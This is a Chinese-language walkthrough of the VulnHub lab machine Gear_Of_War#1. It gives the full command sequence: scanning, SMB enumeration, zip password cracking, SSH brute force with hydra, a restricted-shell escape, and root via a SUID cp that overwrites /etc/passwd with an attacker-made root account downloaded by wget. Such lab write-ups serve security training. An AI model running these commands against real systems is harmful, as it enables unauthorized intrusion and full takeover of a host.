vulnhub之Gear_Of_War#1的实践

本周实践的是vulnhub的Gear_Of_War#1镜像，

下载地址，https://download.vulnhub.com/gearsofwar/Gear_Of_War#1.ova，

用virtualbox导入成功，

做地址扫描，sudo netdiscover -r 192.168.0.0/24，

获取到靶机地址是192.168.0.188，

接着做端口扫描，sudo nmap -sS -sV -T5 -A -p- 192.168.0.188，

发现靶机有22端口的ssh服务和139/445端口的smb服务，

访问smb服务，smbclient -L 192.168.0.188，

发现LOCUS_LAN$路径，

继续访问smb路径，smbclient //192.168.0.188/LOCUS_LAN$，

查看到msg_horda.zip和SOS.txt文件，

下载文件get msg_horda.zip，get SOS.txt，

解压文件，unzip msg_horda.zip，发现需要密码，

查看文件，cat SOS.txt，

发现密码规则提示，@%%,（1个小写字母，两个数字，1个大写字母），

创建密码列表，crunch 4 4 -t @%%, -o wordlist，

破解密码，fcrackzip -D -u -v -p wordlist msg_horda.zip，

获取到密码r44M，

重新解压，查看文件内容，cat key.txt，

发现新的密码3_d4y，

用新发现的密码对ssh进行暴破，

hydra -L /usr/share/wordlists/rockyou.txt -p 3_d4y -T4 192.168.0.188 ssh，

获取到用户名，marcus，

ssh登录，ssh [email protected]，

发现无法执行命令，

重新登录，ssh [email protected] -t "bash --noprofile"，

查找root权限的程序，find /bin -type f -perm -u=s 2>/dev/null，

获取到/bin/cp，

查看系统密码文件内容，cat /etc/passwd，

kali攻击机上新建密码文件vim passwd，

添加新账户，hacker:sa3tHJ3/KuYvI:0:0:hacker:/root:/bin/bash，

kali攻击机上开启http下载服务，python2 -m SimpleHTTPServer，

靶机上进入临时目录，cd /tmp，

下载密码文件，wget http://192.168.0.189:8000/passwd，

覆盖到系统密码文件，cp passwd /etc/passwd，

切换账户，su hacker，id确认是root，

原文始发于微信公众号（云计算和网络安全技术实践）：vulnhub之Gear_Of_War#1的实践